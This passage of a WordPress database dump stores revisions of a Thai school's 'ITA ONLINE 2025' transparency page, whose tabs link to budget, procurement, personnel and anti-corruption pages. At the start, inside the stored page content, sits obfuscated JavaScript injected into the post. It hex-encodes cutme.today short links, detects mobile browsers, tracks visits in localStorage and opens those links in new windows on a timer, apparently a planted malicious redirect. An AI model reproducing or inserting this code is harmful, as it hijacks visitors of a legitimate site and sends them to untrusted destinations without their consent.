\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-01 14:38:36','2025-07-01 07:38:36','',871,'http://pakhaeng.ssk.in.th/?p=1574',0,'revision','',0),
(1575,1,'2025-07-01 14:38:52','2025-07-01 07:38:52','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 